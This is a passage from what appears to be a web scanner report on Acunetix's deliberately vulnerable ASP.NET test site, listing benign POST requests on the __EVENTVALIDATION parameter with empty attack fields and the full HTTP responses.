href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8409&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAiHPU8doIZGRk0X4Aj49TMs6s8iT2xBnXqyY%2F4hc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLggKKtAwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUyXfCjpgLgjbfmD6GtFotZawa4SQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:54 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAiHPU8doIZGRk0X4Aj49TMs6s8iT2xBnXqyY/4hc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLggKKtAwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUyXfCjpgLgjbfmD6GtFotZawa4SQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:White" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8154&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAMTRzKdoIZGRkdHsBpI5Ln17zwfixfUIM076yRaQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLh0874AgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPIcBS8GBczYLnyy9W5BaHIwca1k8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:29 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAMTRzKdoIZGRkdHsBpI5Ln17zwfixfUIM076yRaQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLh0874AgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPIcBS8GBczYLnyy9W5BaHIwca1k8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:White" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> 